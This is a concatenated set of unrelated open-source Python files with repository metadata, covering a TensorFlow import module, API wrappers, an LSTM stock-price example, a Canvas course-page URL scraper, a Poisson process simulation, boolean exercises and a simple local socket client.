34109b133c9e51f5fe159c8a970393a67ac6d7d8 | 169e75df163bb311198562d286d37aad14677101 | /tensorflow/tensorflow/python/ops/gradients.py | 9fa8e27d5cb51e0c2dd0b7926756a579d38841d2 | [
"Apache-2.0"
] | permissive | zylo117/tensorflow-gpu-macosx | e553d17b769c67dfda0440df8ac1314405e4a10a | 181bc2b37aa8a3eeb11a942d8f330b04abc804b3 | refs/heads/master | 2022-10-19T21:35:18.148271 | 2020-10-15T02:33:20 | 2020-10-15T02:33:20 | 134,240,831 | 116 | 26 | Apache-2.0 | 2022-10-04T23:36:22 | 2018-05-21T08:29:12 | C++ | UTF-8 | Python | false | false | 1,240 | py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Implements the graph generation for computation of gradients."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import
from tensorflow.python.eager.backprop import GradientTape
from tensorflow.python.ops.custom_gradient import custom_gradient
from tensorflow.python.ops.gradients_impl import AggregationMethod
from tensorflow.python.ops.gradients_impl import gradients
from tensorflow.python.ops.gradients_impl import hessians
# pylint: enable=unused-import
| [
"thomas.warfel@pnnl.gov"
] | thomas.warfel@pnnl.gov |
f65f159a24c852f737a8a72d67d4b69433fc9497 | d9eb2899fb0e1bee725d68147846489b6446e2f0 | /contentful_management/space_periodic_usage.py | de4eff736048b2fd7297ac75f5900b1ab4259212 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | contentful/contentful-management.py | 1f87ed9819becfa09bea795fba241384a9482045 | 5202e6ded776783c0611338b6613fec731182c3e | refs/heads/master | 2023-09-03T23:22:42.450198 | 2023-01-12T15:12:52 | 2023-01-12T15:12:52 | 84,083,785 | 36 | 18 | MIT | 2023-09-13T15:10:41 | 2017-03-06T14:38:28 | Python | UTF-8 | Python | false | false | 1,294 | py | from .resource import Resource
"""
contentful_management.space_periodic_usage
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module implements the SpacePeriodicUsage class.
API reference: https://www.contentful.com/developers/docs/references/content-management-api/#/reference/usage
:copyright: (c) 2020 by Contentful GmbH.
:license: MIT, see LICENSE for more details.
"""
class SpacePeriodicUsage(Resource):
"""
API reference: https://www.contentful.com/developers/docs/references/content-management-api/#/reference/usage
"""
def __init__(self, item, **kwargs):
super(SpacePeriodicUsage, self).__init__(item, **kwargs)
self.unit_of_measure = item.get('unitOfMeasure', None)
self.metric = item.get('metric', None)
self.usage = item.get('usage', None)
self.usage_per_day = item.get('usagePerDay', None)
self.date_range = item.get('dateRange', None)
def _linkables(self):
return super(SpacePeriodicUsage, self)._linkables() + ['organization']
@classmethod
def base_url(klass, organization_id):
return "organizations/{0}/space_periodic_usages".format(organization_id)
def __repr__(self):
return "<SpacePeriodicUsage id='{0}'>".format(
self.sys.get('id', '')
)
| [
"noreply@github.com"
] | contentful.noreply@github.com |
68d509c7c66a8393f202ba51444e4af380bc3c9b | 9ca9cad46f2358717394f39e2cfac2af4a2f5aca | /Week16/MainHW/MainHW Week16_KSY.py | 86af737749bde01e82c6dcf8a85382d1d4c33cd5 | [] | no_license | Artinto/Python_and_AI_Study | ddfd165d1598914e99a125c3019a740a7791f6f6 | 953ff3780287825afe9ed5f9b45017359707d07a | refs/heads/main | 2023-05-05T15:42:25.963855 | 2021-05-24T12:24:31 | 2021-05-24T12:24:31 | 325,218,591 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 3,897 | py | '''
This script shows how to predict stock prices using a basic RNN
'''
import torch
import torch.nn as nn
from torch.autograd import Variable
import numpy as np
import os
import matplotlib
torch.manual_seed(777) # reproducibility
import matplotlib.pyplot as plt
def MinMaxScaler(data):
''' Min Max Normalization
Parameters
----------
data : numpy.ndarray
input data to be normalized
shape: [Batch size, dimension]
Returns
----------
data : numpy.ndarry
normalized data
shape: [Batch size, dimension]
References
----------
.. [1] http://sebastianraschka.com/Articles/2014_about_feature_scaling.html
'''
numerator = data - np.min(data, 0)
denominator = np.max(data, 0) - np.min(data, 0)
# noise term prevents the zero division
return numerator / (denominator + 1e-7)
# train Parameters
learning_rate = 0.01
num_epochs = 500
input_size = 5
hidden_size = 5
num_classes = 1
timesteps = seq_length = 14
num_layers = 1 # number of layers in RNN
# Open, High, Low, Volume, Close
xy = np.loadtxt('stock.csv', delimiter=',')
xy = xy[::-1] # reverse order (chronically ordered)
xy = MinMaxScaler(xy)
x = xy
y = xy[:, [-1]] # Close as label
# build a dataset
dataX = []
dataY = []
for i in range(0, len(y) - seq_length):
_x = x[i:i + seq_length]
_y = y[i + seq_length] # Next close price
dataX.append(_x)
dataY.append(_y)
# train/test split
train_size = int(len(dataY) * 0.7)
test_size = len(dataY) - train_size
trainX = torch.Tensor(np.array(dataX[0:train_size]))
trainX = Variable(trainX)
testX = torch.Tensor(np.array(dataX[train_size:len(dataX)]))
testX = Variable(testX)
trainY = torch.Tensor(np.array(dataY[0:train_size]))
trainY = Variable(trainY)
testY = torch.Tensor(np.array(dataY[train_size:len(dataY)]))
testY = Variable(testY)
class LSTM(nn.Module):
    """LSTM regressor: maps a (batch, seq_length, input_size) sequence to
    one value per sequence via a linear head on the final hidden state.
    """
    def __init__(self, num_classes, input_size, hidden_size, num_layers):
        """num_classes: output width; input_size: features per timestep;
        hidden_size: LSTM state width; num_layers: stacked LSTM layers.
        """
        super(LSTM, self).__init__()
        self.num_classes = num_classes
        self.num_layers = num_layers
        self.input_size = input_size
        self.hidden_size = hidden_size
        # NOTE(review): 'seq_length' is read from the enclosing module's
        # global, not from a parameter -- confirm this is intentional.
        self.seq_length = seq_length
        # Set parameters for RNN block
        # Note: batch_first=False by default.
        # When true, inputs are (batch_size, sequence_length, input_dimension)
        # instead of (sequence_length, batch_size, input_dimension)
        self.lstm = nn.LSTM(input_size=input_size, hidden_size=hidden_size,
                            num_layers=num_layers, batch_first=True)
        # Fully connected layer
        self.fc = nn.Linear(hidden_size, num_classes)
    def forward(self, x):
        """Run the LSTM over x (batch_first) and return the linear
        projection of the last layer's final hidden state.
        """
        # Initialize hidden and cell states (zeros, not learned).
        h_0 = Variable(torch.zeros(
            self.num_layers, x.size(0), self.hidden_size))
        c_0 = Variable(torch.zeros(
            self.num_layers, x.size(0), self.hidden_size))
        # Propagate input through LSTM
        _, (h_out, _) = self.lstm(x, (h_0, c_0))
        h_out = h_out.view(-1, self.hidden_size)
        out = self.fc(h_out)
        return out
# Instantiate RNN model
lstm = LSTM(num_classes, input_size, hidden_size, num_layers)
# Set loss and optimizer function
criterion = torch.nn.MSELoss()    # mean-squared error for regression
optimizer = torch.optim.Adam(lstm.parameters(), lr=learning_rate)
# Train the model: full-batch gradient descent over the whole training set.
for epoch in range(num_epochs):
    outputs = lstm(trainX)
    optimizer.zero_grad()
    # obtain the loss function
    loss = criterion(outputs, trainY)
    loss.backward()
    optimizer.step()
    print("Epoch: %d, loss: %1.5f" % (epoch, loss.item()))
print("Learning finished!")
# Test the model (eval mode disables dropout/batch-norm behavior).
lstm.eval()
test_predict = lstm(testX)
# Plot predictions against the held-out ground truth.
test_predict = test_predict.data.numpy()
testY = testY.data.numpy()
plt.plot(testY)
plt.plot(test_predict)
plt.xlabel("Time Period")
plt.ylabel("Stock Price")
plt.show()
| [
"noreply@github.com"
] | Artinto.noreply@github.com |
2db1cfdefc172264003cd0e623abc22216f67b0a | 8963880dc47529d966dbb8abd7df5fdf2f673d9f | /venv/bin/chardetect | fbde743e6bb13977107f9778c2dd20de4feeb57d | [] | no_license | jvarghese3/TechRadarPublish | b8dfd2081424f8563a38f9040c3a1d27fca5a42c | 1b4f0e12363cb318250c02547bfafe41c1785bae | refs/heads/master | 2020-03-25T00:44:49.973610 | 2018-08-02T22:22:52 | 2018-08-02T22:22:52 | 143,203,567 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 275 | #!/Users/jvarghese3/PycharmProjects/TechRadarPublish/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
    # Strip the setuptools wrapper suffix ("-script.pyw" / ".exe") from
    # argv[0] so the CLI reports a clean program name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"jvarghese3@MTVL161c44809.local"
] | jvarghese3@MTVL161c44809.local | |
0861a3ba0e77e14cd38e259cec9bfe9413d33873 | e7d5555eb0b80ad59e7c76dd31e5fa9a23ec4a4c | /muddery/worlddata/dao/dialogue_sentences_mapper.py | 6e08b22dd51bc6ba16bc055d6d3aed08c566c4e2 | [
"BSD-3-Clause"
] | permissive | noahzaozao/muddery | 4d1ef24b4a7f0ef178a1c28c367a441cbb57ee5c | 294da6fb73cb04c62e5ba6eefe49b595ca76832a | refs/heads/master | 2023-01-25T02:23:50.123889 | 2018-06-10T17:12:22 | 2018-06-10T17:12:22 | 137,031,119 | 0 | 0 | NOASSERTION | 2019-10-28T15:04:26 | 2018-06-12T07:05:42 | Python | UTF-8 | Python | false | false | 691 | py | """
Query and deal common tables.
"""
from __future__ import print_function
from evennia.utils import logger
from django.apps import apps
from django.conf import settings
class DialogueSentencesMapper(object):
    """Thin accessor around the 'dialogue_sentences' world-data model."""

    def __init__(self):
        # Resolve the Django model once through the app registry and keep
        # both the model class and its default manager at hand.
        self.model_name = "dialogue_sentences"
        self.model = apps.get_model(settings.WORLD_DATA_APP, self.model_name)
        self.objects = self.model.objects

    def filter(self, key):
        """Return the queryset of sentences attached to one dialogue.

        Args:
            key: (string) dialogue's key.
        """
        return self.objects.filter(dialogue=key)
DIALOGUE_SENTENCES = DialogueSentencesMapper()
| [
"luyijun999@gmail.com"
] | luyijun999@gmail.com |
ea86b165173183397c78e5aa1e6322ec98a122de | 740cd3a198c8ebb815da04c0e7a549696ab6a84c | /virtual/bin/wheel | 4ef50c7f2679686ea22a122921d06bdaa0c52a4f | [] | no_license | kahenya-anita/Simple-Ecommerce | 3a3734e8b9f8c5ce489404042c456449adbca724 | ff9d7d06869c52d595304ab238f797a1c65947d0 | refs/heads/master | 2023-03-03T13:40:43.930809 | 2021-02-09T15:24:56 | 2021-02-09T15:24:56 | 337,444,815 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | #!/home/toshiba/Documents/Ecommerce_Django-master/virtual/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from wheel.cli import main
if __name__ == '__main__':
    # Strip the setuptools wrapper suffix ("-script.pyw" / ".exe") from
    # argv[0] so the CLI reports a clean program name.
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"anitakahenya1@gmail.com"
] | anitakahenya1@gmail.com | |
c75990daa686c163399bb778d1290107e5424fe4 | 868f8980eced9e3eeeaf22175e15ba4e44e6e786 | /poisson.py | 555e2f6dfd6fbdc5f6ae77c191e509a05ba3765c | [] | no_license | jin-bowen/stochastic_process | e0990dfda27d33fa0501d4073149250d0c8a4b25 | d754487fcf8ab40ccd6396e164f78679290123cc | refs/heads/master | 2020-08-26T18:06:41.369651 | 2020-05-08T00:16:42 | 2020-05-08T00:16:42 | 217,098,288 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,354 | py | import matplotlib.pyplot as plt
import numpy as np
import scipy as sp
import random
import math
def poisson(r, jump_size, total_t, sample_point=1000):
    """Simulate one path of a counting process with time-varying rate.

    The instantaneous rate is r * (3 + cos(t) + 2*cos(2t)); inter-arrival
    times are drawn from an exponential with the rate evaluated at the
    current event time (piecewise approximation).

    Args:
        r: base rate multiplier.
        jump_size: increment added to the count at every arrival.
        total_t: length of the observation window [0, total_t].
        sample_point: number of evenly spaced sample times recorded.

    Returns:
        numpy.ndarray of shape (sample_point, 2): column 0 holds the sample
        times, column 1 the accumulated count N(t) at each time.
    """
    points = np.zeros((sample_point, 2))
    points[:, 0] = np.linspace(0, total_t, num=sample_point)
    dt = float(total_t) / float(sample_point - 1)
    cum_t = 0.0
    while cum_t <= total_t:
        # Rate evaluated at the current time; the polynomial in cos(t) is
        # bounded below by 15/16, so the division is always safe.
        lambda_i = r * (3 + np.cos(cum_t) + 2 * np.cos(2 * cum_t))
        # Inverse-transform sample of an Exp(lambda_i) inter-arrival time;
        # random.random() is in [0, 1), so the log argument is in (0, 1].
        interval = -math.log(1.0 - random.random()) / lambda_i
        cum_t += interval
        if cum_t > total_t:
            # Bug fix: the next arrival falls outside the window, so it must
            # not be counted (the original added it to the last sample).
            break
        nt = int(np.floor(cum_t / dt))
        points[nt:, 1] += jump_size
    return points
def main():
    """Draw three sample paths (r = 0.1, 1, 10) of the counting process."""
    poisson01 = poisson(0.1, 1, total_t=20, sample_point=100)
    poisson1 = poisson(1.0, 1, total_t=20, sample_point=100)
    poisson10 = poisson(10.0,1, total_t=20, sample_point=100)
    fig, ax = plt.subplots(nrows=3, sharex=True)
    plt.suptitle('counting process')
    # NOTE(review): the subplot titles say "sample points: 1000" but the
    # calls above use sample_point=100 -- confirm which was intended.
    ax[0].set_title('sample points: 1000, r = 0.1')
    ax[0].set_ylabel('N(t)')
    ax[0].plot(poisson01[:,0], poisson01[:,1], 'g-')
    ax[1].set_title('sample points: 1000, r = 1')
    ax[1].set_ylabel('N(t)')
    ax[1].plot(poisson1[:,0], poisson1[:,1], 'y-')
    ax[2].set_title('sample points: 1000, r = 10')
    ax[2].set_ylabel('N(t)')
    ax[2].plot(poisson10[:,0], poisson10[:,1], 'r-')
    plt.legend()
    plt.xlabel('time')
    plt.show()
    #ax.savefig('poisson.png')
if __name__ == "__main__":
main()
| [
"bxj139@case.edu"
] | bxj139@case.edu |
8c8bb9481e76250c7415b792fe42e94758bcab2f | 2aa7d25292f07aa8ede1365f648709a8457c6279 | /Ex_28.py | f558d475bb941546569c0a7635ca72326ef305be | [] | no_license | patrickmgebhard/Learn_python_the_hard_way | b28cf21ee31097844b5d65a147f9ddb5fc7ec847 | 2b98fecb5332f8bb7baf2069ec11e3f0862f1697 | refs/heads/main | 2022-12-24T02:37:26.690637 | 2022-12-12T20:54:43 | 2022-12-12T20:54:43 | 77,302,306 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 657 | py | True and True
# True
False and True
# False
1 == 1 and 2 == 1
# False
"test" == "test"
#True
1 == 1 or 2 != 1
# True
True and 1 == 1
# True
False and 0 != 0
# False
True or 1 == 1
# True
"test" == "testing"
# False
1 != 0 and 2 == 1
# False
"test" != "testing"
# True
"test" == 1
# False
not (True and False)
# True
not (1 == 1 and 0 != 1)
# False
not (10 == 1 or 1000 == 1000)
# False
not (1 != 10 or 3 == 4)
# False
not ("testing" == "testing" and "Zed" == "Cool Guy")
# True
1 == 1 and (not ("testing" == 1 or 1 == 0))
# True
"chunky" == "bacon" and (not (3 == 4 or 3 == 3))
# False
3 == 3 and (not ("testing" == "testing" or "Python" == "Fun"))
# False
| [
"patrickmgebhard@gmail.com"
] | patrickmgebhard@gmail.com |
6b34dfae513fa55c66c92dd64ea87fa9d1207242 | 45a924e5cd1dfc75a2088d3d4463995803a06a09 | /frappe/email/doctype/email_unsubscribe/test_email_unsubscribe.py | 602840fe3b30b30238661516ade48243176ea9b0 | [
"MIT"
] | permissive | joe-santy/frappe | 7cad66295f07f60176fbbc24766af5e38ac1e9d2 | a6d9170e5fd9fdff462eee7967409ff7e23b6d2f | refs/heads/develop | 2023-07-15T15:59:03.226729 | 2021-08-09T16:20:11 | 2021-08-09T16:20:11 | 394,489,040 | 0 | 0 | MIT | 2021-08-13T13:12:31 | 2021-08-10T01:22:17 | null | UTF-8 | Python | false | false | 258 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# See license.txt
import frappe
import unittest
# test_records = frappe.get_test_records('Email Unsubscribe')
class TestEmailUnsubscribe(unittest.TestCase):
    """Placeholder suite for the Email Unsubscribe doctype (no tests yet)."""
    pass
| [
"rmehta@gmail.com"
] | rmehta@gmail.com |
5271e0aa4d4bd54e4dc811366c02c1b6de9d5155 | e7069d85fd4a6fac4958f19b4d14503ffa42b4bb | /connecting_silos_kththesis_TCOMK_CINTE/mysite/polls/library/Canvas-master/compute_list_of_KTH_play_URLs_on_pages_in_course3.py | 3320841678f5de02e64319ba7c296b48e4a75a03 | [] | no_license | ShivaBP/Bechelor-degree-project | cd062ff10e207e380a2c59bc0a50f073c2e866bd | 9f055d69ec9deabb6bd8ab3768c9d56787eed94d | refs/heads/master | 2022-07-21T01:18:41.893027 | 2018-11-16T14:38:13 | 2018-11-16T14:38:13 | 137,949,087 | 0 | 0 | null | 2022-07-06T19:49:14 | 2018-06-19T21:47:51 | HTML | UTF-8 | Python | false | false | 16,355 | py | #!/usr/bin/python3
#
# ./compute_list_of_KTH_play_URLs_on_pages_in_course3.py course_id
#
# walks all of the course pages, the syllabus, and assignments
#
# it outputs a CSV file with the name URLs_for_course_xx.csv
# where xx is the course_id
#
# G. Q. Maguire Jr.
#
# 2017.04.21
# based on earlier program: compute_stats_for_pages_in_course.py
#
import csv, requests, time
from pprint import pprint
import optparse
import sys
from lxml import html
import json
#############################
###### EDIT THIS STUFF ######
#############################
# styled based upon https://martin-thoma.com/configuration-files-in-python/
with open('config.json') as json_data_file:
configuration = json.load(json_data_file)
canvas = configuration['canvas']
access_token= canvas["access_token"]
# access_token=configuration["canvas"]["access_token"]
#baseUrl = 'https://kth.instructure.com/api/v1/courses/' # changed to KTH domain
baseUrl = 'https://%s/api/v1/courses/' % canvas.get('host', 'kth.instructure.com')
header = {'Authorization' : 'Bearer ' + access_token}
#modules_csv = 'modules.csv' # name of file storing module names
log_file = 'log.txt' # a log file. it will log things
def write_to_log(message):
    """Append *message* (plus a newline) to the global log file, then echo it."""
    with open(log_file, 'a') as log_handle:
        log_handle.write(message)
        log_handle.write("\n")
    pprint(message)
def unique_URLs(txt):
    """Collect the whitespace-separated tokens of *txt* that contain an
    http:// or https:// URL.

    Bug fix: the original only checked four literal spellings of the scheme
    ("http://", "HTTP://", "https://", "HTTPs://"), so variants such as
    "HTTPS://" or "Https://" were silently dropped; the scheme is now
    matched case-insensitively.

    Args:
        txt: arbitrary text.

    Returns:
        set of the matching tokens (original casing preserved).
    """
    set_of_unique_URLs = set()
    for t in txt.split():
        lowered = t.lower()
        # Substring test (not startswith) keeps tokens like '(http://x)'.
        if "http://" in lowered or "https://" in lowered:
            set_of_unique_URLs.add(t)
    return set_of_unique_URLs
def unique_KTH_Play_URLs(set_of_urls):
    """Filter *set_of_urls* down to the links hosted on play.kth.se."""
    return {url for url in set_of_urls if "//play.kth.se" in url}
def compute_stats_for_pages_in_course(course_id):
    """Collect the unique KTH Play URLs found on every wiki page of a course.

    Args:
        course_id: Canvas course id.

    Returns:
        list of dicts with keys 'url', 'page_name' and 'unique URLs'
        (one entry per parsable page), or False if a page fetch fails.
    """
    list_of_all_pages=[]
    page_stats=[]
    # Use the Canvas API to get the list of pages for this course
    #GET /api/v1/courses/:course_id/pages
    url = baseUrl + '%s/pages' % (course_id)
    if Verbose_Flag:
        print("url: " + url)
    r = requests.get(url, headers = header)
    if Verbose_Flag:
        write_to_log("result of getting pages: " + r.text)
    if r.status_code != requests.codes.ok:
        print("No pages for course_id: {}".format(course_id))
        return False
    page_response=r.json()
    for p_response in page_response:
        list_of_all_pages.append(p_response)
    # Follow the Link-header pagination until the last chunk has arrived.
    # see "Handling Pagination", https://community.canvaslms.com/thread/1500
    while r.links['current']['url'] != r.links['last']['url']:
        r = requests.get(r.links['next']['url'], headers=header)
        page_response = r.json()
        for p_response in page_response:
            list_of_all_pages.append(p_response)
    for p in list_of_all_pages:
        # Collect a fresh set of links for each page.
        raw_links = set()
        print("{}".format(p["title"]))
        # Use the Canvas API to GET the page
        #GET /api/v1/courses/:course_id/pages/:url
        url = baseUrl + '%s/pages/%s' % (course_id, p["url"])
        if Verbose_Flag:
            print(url)
        r = requests.get(url, headers = header, data={})
        if r.status_code != requests.codes.ok:
            print("No pages for course_id: {}".format(course_id))
            return False
        page_response = r.json()
        if Verbose_Flag:
            print("body: {}".format(page_response["body"]))
        try:
            document = html.document_fromstring(page_response["body"])
            for link in document.xpath('//a/@href'):
                if Verbose_Flag:
                    print("link: {}".format(link))
                raw_links.add(link)
        except ValueError:
            # Pages that contain raw code (e.g. a JSON structure) can defeat
            # the HTML parser; skip such pages entirely.
            if Verbose_Flag:
                print("there is likely code on page {}".format(url))
            continue
        if Verbose_Flag:
            print("raw_links: {}".format(raw_links))
        # Escape characters that would otherwise corrupt the CSV output.
        # (The original ZeroDivisionError/ValueError handlers around these
        # pure string operations were unreachable and have been removed.)
        fixed_title=page_response["title"].replace(',', '_comma_')
        fixed_title=fixed_title.replace('"', '_doublequote_')
        fixed_title=fixed_title.replace("'", '_singlequote_')
        page_entry={"url": url, "page_name": fixed_title, "unique URLs": unique_KTH_Play_URLs(raw_links)}
        page_stats.append(page_entry)
    return page_stats
def get_course_syllabus(course_id):
    """Collect the unique KTH Play URLs found in a course's syllabus.

    Args:
        course_id: Canvas course id.

    Returns:
        list with at most one page-entry dict (empty list when the syllabus
        body is empty), or False if the syllabus could not be fetched.
    """
    page_stats=[]
    raw_links = set()
    # Use the Canvas API to get the syllabus for this course
    #GET /api/v1/courses/:course_id?include[]=syllabus_body
    url = baseUrl + '%s' % (course_id)
    if Verbose_Flag:
        print("url: " + url)
    extra_parameters={'include[]': 'syllabus_body'}
    r = requests.get(url, params=extra_parameters, headers = header)
    if Verbose_Flag:
        write_to_log("result of getting syllabus: " + r.text)
    if r.status_code != requests.codes.ok:
        print("No syllabus for course_id: {}".format(course_id))
        return False
    page_response=r.json()
    if Verbose_Flag:
        print("body: {}".format(page_response["syllabus_body"]))
    # NOTE(review): assumes syllabus_body is a string; a null body would
    # raise a TypeError here -- confirm against the Canvas API.
    if len(page_response["syllabus_body"]) == 0:
        return []
    try:
        document = html.document_fromstring(page_response["syllabus_body"])
        for link in document.xpath('//a/@href'):
            if Verbose_Flag:
                print("link: {}".format(link))
            raw_links.add(link)
    except ValueError:
        # Syllabi that contain raw code (e.g. a JSON structure) can defeat
        # the HTML parser; fall through with whatever links were collected.
        if Verbose_Flag:
            print("there is likely code on page {}".format(url))
    # The original wrapped this in try/except ZeroDivisionError/ValueError,
    # but none of these operations can raise either; handlers removed.
    page_entry={"url": url, "page_name": 'Syllabus', "unique URLs": unique_KTH_Play_URLs(raw_links)}
    page_stats.append(page_entry)
    return page_stats
def list_pages(course_id):
    """Fetch every wiki page of the course and print its title."""
    all_pages = []
    # Use the Canvas API to get the list of pages for this course
    # GET /api/v1/courses/:course_id/pages
    url = baseUrl + '%s/pages' % (course_id)
    if Verbose_Flag:
        print("url: " + url)
    r = requests.get(url, headers=header)
    if Verbose_Flag:
        write_to_log("result of getting pages: " + r.text)
    if r.status_code == requests.codes.ok:
        all_pages.extend(r.json())
        # Keep following the Link-header pagination until the final chunk
        # has been fetched (responses arrive split into pieces).
        while r.links['current']['url'] != r.links['last']['url']:
            r = requests.get(r.links['next']['url'], headers=header)
            all_pages.extend(r.json())
    for p in all_pages:
        print("{}".format(p["title"]))
def get_assignments(course_id):
    """Collect the unique KTH Play URLs found in each assignment description.

    Args:
        course_id: Canvas course id.

    Returns:
        list of dicts with keys 'url', 'page_name' and 'unique URLs',
        one per assignment whose description could be parsed.
    """
    assignments_found_thus_far=[]
    page_stats=[]
    # make a new list of links
    raw_links = set()
    # Use the Canvas API to get the list of assignments for the course
    #GET /api/v1/courses/:course_id/assignments
    url = baseUrl + '%s/assignments' % (course_id)
    if Verbose_Flag:
        print("url: " + url)
    r = requests.get(url, headers = header)
    if Verbose_Flag:
        write_to_log("result of getting assignments: " + r.text)
    if r.status_code == requests.codes.ok:
        page_response=r.json()
        for p_response in page_response:
            assignments_found_thus_far.append(p_response)
        # the following is needed when the reponse has been paginated
        # i.e., when the response is split into pieces - each returning only some of the list of modules
        # see "Handling Pagination" - Discussion created by tyler.clair@usu.edu on Apr 27, 2015, https://community.canvaslms.com/thread/1500
        while r.links['current']['url'] != r.links['last']['url']:
            r = requests.get(r.links['next']['url'], headers=header)
            page_response = r.json()
            for p_response in page_response:
                assignments_found_thus_far.append(p_response)
    for a in assignments_found_thus_far:
        # make a new list of links for each assignment
        raw_links = set()
        print("{}".format(a["name"]))
        url = a["html_url"]
        if Verbose_Flag:
            print(url)
        if Verbose_Flag:
            print("description: {}".format(a["description"]))
        try:
            document = html.document_fromstring(a["description"])
            #raw_text = document.text_content()
            for link in document.xpath('//a/@href'):
                if Verbose_Flag:
                    print("link: {}".format(link))
                raw_links.add(link)
        except ValueError:
            # if there is code on the page, for example a json structure, then the hyphenation package cannot handle this
            if Verbose_Flag:
                print("there is likely code on page {}".format(url))
            continue
        # see http://www.erinhengel.com/software/textatistic/
        # Escape characters that would corrupt the CSV output.
        try:
            fixed_title=a["name"].replace(',', '_comma_')
            fixed_title=fixed_title.replace('"', '_doublequote_')
            fixed_title=fixed_title.replace("'", '_singlequote_')
            page_entry={"url": url, "page_name": fixed_title, "unique URLs": unique_KTH_Play_URLs(raw_links)}
        except ZeroDivisionError:
            # NOTE(review): this handler (and the ValueError one below) looks
            # unreachable -- the string operations above cannot raise either.
            # if there are zero sentences, then some of the scores cannot be computed
            if Verbose_Flag:
                print("no sentences in assignment {}".format(url))
            continue
        except ValueError:
            # if there is code on the page, for example a json structure, then the hyphenation package cannot handle this
            if Verbose_Flag:
                print("there is likely code on page {}".format(url))
            continue
        if page_entry:
            page_stats.append(page_entry)
    return page_stats
def main():
    """Command-line entry point: gather KTH Play URLs from a course's wiki
    pages, syllabus and assignments, then write them to
    KTHplay_URLs_for_course_<course_id>.csv.
    """
    global Verbose_Flag
    parser = optparse.OptionParser()
    parser.add_option('-v', '--verbose',
                      dest="verbose",
                      default=False,
                      action="store_true",
                      help="Print lots of output to stdout"
    )
    options, remainder = parser.parse_args()
    Verbose_Flag=options.verbose
    if Verbose_Flag:
        print('ARGV :', sys.argv[1:])
        print('VERBOSE :', options.verbose)
        print('REMAINING :', remainder)
    # add time stamp to log file
    log_time = str(time.asctime(time.localtime(time.time())))
    if Verbose_Flag:
        write_to_log(log_time)
    if (len(remainder) < 1):
        print("Inusffient arguments\n must provide course_id\n")
    else:
        course_id=remainder[0]
        # NOTE(review): each helper may return False on a fetch failure;
        # appending/iterating over False here would raise -- confirm the
        # failure paths are acceptable for interactive use.
        output=compute_stats_for_pages_in_course(course_id)
        if Verbose_Flag:
            print("output: {}".format(output))
        output2=get_course_syllabus(course_id)
        if Verbose_Flag:
            print("output2: {}".format(output2))
        for i in output2:
            output.append(i)
        if Verbose_Flag:
            print("output following syllabus processing: {}".format(output))
        output3=get_assignments(course_id)
        if Verbose_Flag:
            print("output3: {}".format(output3))
        for i in output3:
            output.append(i)
        if Verbose_Flag:
            print("output following assignment processing: {}".format(output))
        if (output):
            if Verbose_Flag:
                print(output)
            # Hand-rolled CSV: the file is opened in binary mode and every
            # cell is UTF-8 encoded with a trailing comma.
            with open('KTHplay_URLs_for_course_'+course_id+'.csv', "wb") as writer:
                spreadsheet_headings = ['url', 'page_name', 'unique URLs']
                for heading in spreadsheet_headings:
                    encoded_output =bytes((heading + ","), 'UTF-8')
                    writer.write(encoded_output)
                writer.write(bytes(u'\n', 'UTF-8'))
                for item in output:
                    out_row = [item['url'], item['page_name'], item['unique URLs']]
                    for v in out_row:
                        if type(v) is str:
                            encoded_output = bytes((v + ","), 'UTF-8')
                        else:
                            encoded_output = bytes((str(v) + ","), 'UTF-8')
                        writer.write(encoded_output)
                    writer.write(bytes(u'\n', 'UTF-8'))
            # The 'with' block above already closed the file; this extra
            # close is a harmless no-op.
            writer.close()
        # add time stamp to log file
        log_time = str(time.asctime(time.localtime(time.time())))
        if Verbose_Flag:
            write_to_log(log_time)
        write_to_log("\n--DONE--\n\n")
if __name__ == "__main__": main()
| [
"shivabp@icloud.com"
] | shivabp@icloud.com |
00967f74adf86ff5e01d221fc7f5261c3c393ca7 | caf246497410866e0f9896c2e51d790518c63f35 | /PythonClient.py | ef5ce956f11a4f5df93a48281d3ffcc8a86bbc21 | [] | no_license | StevenLdh/PythonStudyOne | e979231cbf6fd5a433b86f4b409cfa71b5d8e4b2 | 0f98aa1d478d46c55b2d5cf9af5f6b6fe27f4bcf | refs/heads/master | 2020-04-02T17:40:11.754086 | 2019-05-20T06:11:34 | 2019-05-20T06:11:34 | 154,666,795 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | #!/usr/bin/python3
# File name: client.py
# Import the socket and sys modules
import socket
import sys
# Create a socket object
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Get the local host name
host = socket.gethostname()
# Set the port number
port = 9999
# Connect to the service on the given host and port
s.connect((host, port))
# Receive at most 1024 bytes of data
msg = s.recv(1024)
s.close()
print(msg.decode('utf-8')) | [
"lidehuawork@163.com"
] | lidehuawork@163.com |
